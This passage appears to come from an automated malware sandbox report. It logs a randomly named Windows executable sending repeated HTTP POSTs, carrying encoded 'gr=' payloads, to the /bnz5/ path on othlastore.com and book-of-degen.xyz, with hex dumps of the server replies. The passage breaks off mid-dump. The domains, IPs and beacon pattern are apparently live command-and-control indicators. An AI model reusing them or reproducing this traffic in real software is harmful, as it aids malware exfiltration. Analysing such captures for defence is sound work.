                                                                                                      Data Raw: 67 72 3d 2b 66 59 49 51 4c 73 71 63 53 49 65 45 53 6a 52 38 33 7a 52 4a 57 63 34 52 2b 48 6e 48 35 67 62 67 64 6d 6a 75 32 6c 6c 43 35 4c 4f 33 46 66 68 76 48 63 37 69 79 55 6f 6e 69 56 49 67 63 4a 76 34 63 36 4b 38 34 62 41 6f 4e 54 53 78 63 35 55 75 79 4d 53 76 66 33 71 42 77 61 6c 55 69 37 6d 65 2b 4b 56 6a 50 79 36 61 76 6c 55 30 57 38 75 61 72 7a 2b 62 4b 6f 75 58 2f 76 4f 74 76 63 57 66 2b 39 2b 63 75 7a 2f 52 51 79 6a 68 61 4d 78 76 6f 30 78 2f 37 53 47 49 39 6a 4d 36 32 48 38 32 71 78 48 42 6d 73 72 55 56 71 6c 59 78 57 68 63 4c 6b 71 4c 2f 45 55 6f 63 4a 54 59 70 43 33 62 67 34 70 4b 35 59 3d
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeESjR83zRJWc4R+HnH5gbgdmju2llC5LO3FfhvHc7iyUoniVIgcJv4c6K84bAoNTSxc5UuyMSvf3qBwalUi7me+KVjPy6avlU0W8uarz+bKouX/vOtvcWf+9+cuz/RQyjhaMxvo0x/7SGI9jM62H82qxHBmsrUVqlYxWhcLkqL/EUocJTYpC3bg4pK5Y=
                                                                                                      Apr 16, 2024 12:00:37.803324938 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:37 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.54973791.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:40.327210903 CEST729OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 2b 66 59 49 51 4c 73 71 63 53 49 65 4c 53 54 52 77 30 62 52 50 32 63 33 65 65 48 6e 4e 5a 67 58 67 64 36 6a 75 33 67 6f 46 50 37 4f 77 67 6a 68 75 44 49 37 68 79 55 6f 2f 53 56 4a 6b 63 49 6a 34 63 32 6f 38 38 62 41 6f 4e 76 53 78 5a 46 55 74 42 30 52 70 50 33 6f 56 41 61 6e 4c 79 37 6d 65 2b 4b 56 6a 50 6e 79 61 76 4e 55 30 47 4d 75 63 4b 7a 39 52 71 6f 74 65 66 76 4f 70 76 64 64 66 2b 39 63 63 73 47 51 52 53 4b 6a 68 62 38 78 75 36 4d 32 30 37 53 41 47 64 69 49 30 56 75 49 77 34 39 35 63 58 45 75 41 55 6a 64 64 48 37 4c 47 70 73 43 59 66 6f 73 34 50 42 6b 4a 5a 6a 65 42 44 6f 5a 55 75 4d 55 47 54 63 6a 72 57 43 6b 71 73 43 78 57 4a 2f 55 71 61 54 7a
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeLSTRw0bRP2c3eeHnNZgXgd6ju3goFP7OwgjhuDI7hyUo/SVJkcIj4c2o88bAoNvSxZFUtB0RpP3oVAanLy7me+KVjPnyavNU0GMucKz9RqotefvOpvddf+9ccsGQRSKjhb8xu6M207SAGdiI0VuIw495cXEuAUjddH7LGpsCYfos4PBkJZjeBDoZUuMUGTcjrWCkqsCxWJ/UqaTz
                                                                                                      Apr 16, 2024 12:00:40.549858093 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:40 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.54973891.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:43.058501959 CEST1746OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 2b 66 59 49 51 4c 73 71 63 53 49 65 4c 53 54 52 77 30 62 52 50 32 63 33 65 65 48 6e 4e 5a 67 58 67 64 36 6a 75 33 67 6f 46 4d 62 4f 77 53 62 68 76 6b 6b 37 67 79 55 6f 68 69 56 4d 6b 63 4a 35 34 63 75 73 38 38 66 32 6f 49 6a 53 7a 2f 52 55 6f 30 59 52 6e 50 33 6f 4b 51 61 6b 55 69 36 6b 65 2b 61 52 6a 50 33 79 61 76 4e 55 30 45 6b 75 66 62 7a 39 65 4b 6f 75 58 2f 76 43 74 76 63 36 66 2b 6b 68 63 73 44 76 51 6a 71 6a 67 37 73 78 74 50 59 32 39 37 53 43 42 64 69 75 30 56 79 58 77 34 67 4b 63 58 78 42 41 54 6e 64 66 42 57 54 65 62 63 35 4b 65 4a 4f 38 64 74 2f 66 74 7a 69 63 43 49 33 5a 74 67 4f 47 58 51 52 39 78 57 58 6d 34 44 49 42 74 66 63 6f 64 75 74 44 61 63 4d 41 33 35 50 6d 58 2b 6c 65 55 54 2b 4d 5a 72 35 74 57 43 78 48 51 6d 6d 4b 33 77 64 64 2f 46 6f 6e 51 4a 7a 37 39 57 30 67 78 41 75 42 37 33 6d 4e 32 6d 4d 36 50 65 61 53 46 48 79 31 70 79 55 30 6a 4d 39 76 5a 59 52 44 70 5a 32 54 7a 6e 48 5a 75 4e 4a 76 32 6e 74 47 68 47 2b 79 6c 71 73 57 4e 54 39 6a 30 6c 36 62 5a 65 66 6c 76 58 38 38 4f 44 2f 4a 6c 66 35 78 34 78 56 70 78 4c 75 6e 41 2b 77 44 76 69 6a 6d 48 62 31 4a 6f 44 72 4b 58 54 7a 38 31 45 32 74 62 70 56 47 79 36 73 57 73 71 63 58 61 72 56 7a 78 4e 6d 4b 35 56 50 50 69 67 74 4c 73 4e 73 7a 58 70 39 34 36 37 4c 47 66 4b 5a 72 36 36 35 6e 59 36 6f 73 31 65 66 48 59 58 32 6b 47 65 62 6f 35 71 36 4c 46 5a 43 57 74 30 45 43 63 77 50 47 5a 6c 33 35 47 62 55 79 66 39 73 50 30 66 73 48 32 71 61 6f 63 65 34 56 6e 6e 44 66 78 36 69 58 34 6c 31 6b 51 33 49 7a 34 72 76 4f 6b 34 33 5a 6c 43 39 42 45 46 2b 48 78 73 43 59 4b 42 6e 78 6e 50 77 6a 6c 37 44 47 69 77 52 56 56 51 37 68 42 51 73 79 6e 6f 6a 74 62 51 52 61 73 6f 2b 55 43 6b 51 54 79 66 70 68 79 35 48 59 66 5a 2f 38 75 77 34 49 31 52 74 38 4c 35 48 67 68 6b 31 35 61 56 36 48 48 65 62 59 46 66 52 55 30 7a 68 57 58 63 36 6a 49 78 4d 47 48 4d 30 62 30 76 71 4e 4d 4b 31 4e 6a 62 4d 43 75 46 77 62 61 2f 78 61 2f 79 51 6a 69 42 44 73 37 4f 59 69 66 46 71 6c 65 2f 4f 62 65 55 2f 58 4a 41 65 2b 7a 74 69 69 46 53 52 33 44 6e 68 6f 68 31 54 6f 72 53 72 66 51 70 30 61 58 68 4e 71 6d 4e 63 6a 41 31 69 79 7a 58 32 71 67 6e 6e 49 31 50 43 2f 6a 61 49 67 59 51 4b 59 4a 31 6d 53 58 45 67 51 2f 32 57 61 73 4f 79 52 42 53 34 48 57 53 61 46 53 72 49 4a 67 33 30 4e 55 55 52 6a 32 39 72 4e 69 71 47 46 2b 62 75 6e 38 37 54 54 32 45 61 33 6c 56 6a 30 53 38 54 74 46 4d 63 58 68 55 74 6d 57 66 78 7a 6a 71 6c 57 50 69 72 68 36 72 43 2b 41 7a 42 35 69 6c 43 30 4f 4c 2f 4b 50 51 45 41 68 4a 46 54 59 54 34 73 30 4e 4b 54 4c 57 66 4e 30 76 36 76 6c 31 37 47 6d 2b 6e 70 67 46 49 79 36 49 42 48 4d 61 6f 4e 2f 56 46 59 68 6d 52 51 4d 79 32 69 4f 78 46 72 38 6d 4d 44 75 61 67 4e 69 43 6d 56 4b 4a 42 52 55 49 35 4f 42 32 31 59 6e 35 4b 41 4a 6f 34 50 62 37 77 63 5a 62 2f 32 43 4a 59 53 38 79 51 56 66 2b 30 56 53 55 69 4b 77 44 2b 45 36 55 38 36 77 35 58 54 53 49 37 36 41 51 68 48 5a 41 31 45 2b 31 70 54 77 55 2b 6e 2f 47 71 78 5a 31 53 32 4b 44 7a 32 73 48 2f 6d 6d 2f 6a 2b 58 65 7a 69 6f 58 56 4f 6c 55 4c 73 67 30 68 65 72 34 45 6a 41 7a 4a 6a 6d 5a 4b 49 6a 7a 61 2b 76 4f 6b 47 6b 46 49 36 4e 53 4c 54 5a 42 72 7a 4e 67 7a 33 6a 4e 51 6e 44 57 44 51 75 6d 4f 57 50 62 70 6e 6e 42 41 39 48 79 4e 47 76 53 53 51 68 41 4f 53 75 6a 79 32 45 2b 54 6e 57 6e 5a 77 67 68 4b 6d 76 6d 47 62 5a 58 78 79 4f 46 63 50 31 61 65 79 49 44 64 53 2f 56 65 4e 59 4b 4b 50 35 63 41 33 42 67 46 79 41 36 66 4f 48 6a 49 31 78 4e 62 73 71 66 49 64 54 58 4b 32 73 2f 62 4a 57 6a 42 4d 53 42 7a 31 33 4d 58 34 54 32 67 44 7a 32 64 72 75 6e 39 77 77 6b 79 43 6e 65 77 34 72 53 36 57 5a 77 2b 4d 58 67 35 45 63 4f 34 6e 53 59 6d 5a 68 74 69 6f 75 30 58 76 4b 35 76 43 72 55 35 30 74 67 5a 7a 37 75 79 48 68 4c 30 37 78 53 78 6a 73 42 58 68 67 3d 3d
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeLSTRw0bRP2c3eeHnNZgXgd6ju3goFMbOwSbhvkk7gyUohiVMkcJ54cus88f2oIjSz/RUo0YRnP3oKQakUi6ke+aRjP3yavNU0Ekufbz9eKouX/vCtvc6f+khcsDvQjqjg7sxtPY297SCBdiu0VyXw4gKcXxBATndfBWTebc5KeJO8dt/ftzicCI3ZtgOGXQR9xWXm4DIBtfcodutDacMA35PmX+leUT+MZr5tWCxHQmmK3wdd/FonQJz79W0gxAuB73mN2mM6PeaSFHy1pyU0jM9vZYRDpZ2TznHZuNJv2ntGhG+ylqsWNT9j0l6bZeflvX88OD/Jlf5x4xVpxLunA+wDvijmHb1JoDrKXTz81E2tbpVGy6sWsqcXarVzxNmK5VPPigtLsNszXp9467LGfKZr665nY6os1efHYX2kGebo5q6LFZCWt0ECcwPGZl35GbUyf9sP0fsH2qaoce4VnnDfx6iX4l1kQ3Iz4rvOk43ZlC9BEF+HxsCYKBnxnPwjl7DGiwRVVQ7hBQsynojtbQRaso+UCkQTyfphy5HYfZ/8uw4I1Rt8L5Hghk15aV6HHebYFfRU0zhWXc6jIxMGHM0b0vqNMK1NjbMCuFwba/xa/yQjiBDs7OYifFqle/ObeU/XJAe+ztiiFSR3Dnhoh1TorSrfQp0aXhNqmNcjA1iyzX2qgnnI1PC/jaIgYQKYJ1mSXEgQ/2WasOyRBS4HWSaFSrIJg30NUURj29rNiqGF+bun87TT2Ea3lVj0S8TtFMcXhUtmWfxzjqlWPirh6rC+AzB5ilC0OL/KPQEAhJFTYT4s0NKTLWfN0v6vl17Gm+npgFIy6IBHMaoN/VFYhmRQMy2iOxFr8mMDuagNiCmVKJBRUI5OB21Yn5KAJo4Pb7wcZb/2CJYS8yQVf+0VSUiKwD+E6U86w5XTSI76AQhHZA1E+1pTwU+n/GqxZ1S2KDz2sH/mm/j+XezioXVOlULsg0her4EjAzJjmZKIjza+vOkGkFI6NSLTZBrzNgz3jNQnDWDQumOWPbpnnBA9HyNGvSSQhAOSujy2E+TnWnZwghKmvmGbZXxyOFcP1aeyIDdS/VeNYKKP5cA3BgFyA6fOHjI1xNbsqfIdTXK2s/bJWjBMSBz13MX4T2gDz2drun9wwkyCnew4rS6WZw+MXg5EcO4nSYmZhtiou0XvK5vCrU50tgZz7uyHhL07xSxjsBXhg==
                                                                                                      Apr 16, 2024 12:00:43.270207882 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:43 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.54973991.195.240.117802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:45.798046112 CEST450OUTGET /bnz5/?gr=zdwoT+oWWlgyDxCB5HfbKl0ceeCoMM1WsfXRj0lrAfPT+1DsmzcZqVZ0gwFwp9Re8dyKn5b7kYDBw8FcuEN9m4nkKjfCAjjkfqKhmamnNO4NqnkVPKDFVPgTCNPXruJSGA==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:46.013204098 CEST107INHTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:45 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.54974075.2.60.5802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:51.277666092 CEST718OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 77 32 30 72 35 6b 53 77 71 43 73 66 6f 57 48 61 6a 72 6b 75 39 6e 7a 69 63 79 32 43 70 52 72 59 55 59 46 75 50 67 44 55 34 68 68 71 70 2b 54 5a 33 71 63 31 74 52 45 49 73 69 62 4f 53 6c 46 2b 47 69 48 62 30 5a 6a 77 72 72 42 45 32 75 39 77 43 47 63 35 46 54 71 74 75 4f 50 6a 49 4b 49 41 36 37 49 74 7a 69 6c 77 4f 74 55 38 51 46 51 78 36 61 59 31 38 39 4d 58 72 72 4a 6a 33 68 4b 36 6a 31 7a 4d 7a 73 2b 41 56 4b 62 57 75 63 58 73 6e 46 36 7a 5a 76 30 6b 44 37 4f 49 72 6f 58 68 4a 6e 66 66 64 38 6d 73 4e 77 57 47 6f 31 51 33 50 4d 47 35 79 6f 48 57 44 43 65 36 76 35 4f 41 73 30 32 64 50 62 51 3d
                                                                                                      Data Ascii: gr=w20r5kSwqCsfoWHajrku9nzicy2CpRrYUYFuPgDU4hhqp+TZ3qc1tREIsibOSlF+GiHb0ZjwrrBE2u9wCGc5FTqtuOPjIKIA67ItzilwOtU8QFQx6aY189MXrrJj3hK6j1zMzs+AVKbWucXsnF6zZv0kD7OIroXhJnffd8msNwWGo1Q3PMG5yoHWDCe6v5OAs02dPbQ=
                                                                                                      Apr 16, 2024 12:00:51.419419050 CEST1228INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:51 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5M9C7DRX0A3PMYF6BG4XB
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 